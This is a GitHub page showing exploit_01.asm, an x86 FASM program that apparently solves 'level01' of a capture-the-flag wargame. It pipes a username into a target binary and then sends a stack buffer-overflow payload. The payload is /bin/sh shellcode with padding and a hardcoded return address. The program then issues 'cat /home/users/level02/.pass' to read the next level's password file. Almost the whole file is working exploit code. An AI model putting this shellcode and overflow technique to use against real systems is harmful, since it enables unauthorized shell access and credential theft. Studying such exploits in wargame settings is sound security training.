-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit_01.asm
More file actions
104 lines (95 loc) · 1.73 KB
/
exploit_01.asm
File metadata and controls
104 lines (95 loc) · 1.73 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
format ELF executable $03
entry _start
struc string data*& {
.: db data
.length = ($ - .)
}
struc timespec {
.tv_sec: rq $01
.tv_nsec: rq $01
}
virtual at $00
timespec timespec
timespec.sizeof = $
end virtual
segment executable readable
_start:
and esp, not $0F
sub esp, $08
mov eax, $2A
mov ebx, esp
int $80
test eax, eax
jnz .exit
mov eax, $04
mov ebx, dword [esp+$04]
mov ecx, _username
mov edx, _username.length
int $80
mov eax, $3F
mov ebx, dword [esp]
xor ecx, ecx
int $80
mov eax, $02
int $80
test eax, eax
jz .child
sub esp, timespec.sizeof
xor eax, eax
mov edi, esp
mov ecx, timespec.sizeof
cld
rep stosb
mov byte [esp+timespec.tv_sec], $01
mov eax, $A2
mov ebx, esp
xor ecx, ecx
int $80
mov eax, $04
mov ebx, dword [esp+timespec.sizeof+$04]
mov ecx, _payload
mov edx, _payload.length
int $80
mov eax, $A2
mov ebx, esp
xor ecx, ecx
int $80
mov eax, $04
mov ebx, dword [esp+timespec.sizeof+$04]
mov ecx, _command
mov edx, _command.length
int $80
jmp .exit
.child:
mov eax, $0B
mov ebx, _program
xor edx, edx
push edx ebx
mov ecx, esp
int $80
.exit:
mov eax, $01
xor ebx, ebx
int $80
segment readable
_username string "dat_wil", $0A
_command string "cat /home/users/level02/.pass", $0A
_program: db "/home/users/level01/level01", $00
_payload:
jmp short _init
_next:
mov ecx, esp
mov ebx, dword [esp]
xor byte [ebx+$07], $FF
xor eax, eax
mov al, $0B
int $80
_init:
xor edx, edx
push edx
call _next
db "/bin/sh", $FF
times ($50-($-_payload)) db '_'
dd $FFFFDE0C
db $0A
_payload.length = ($ - _payload)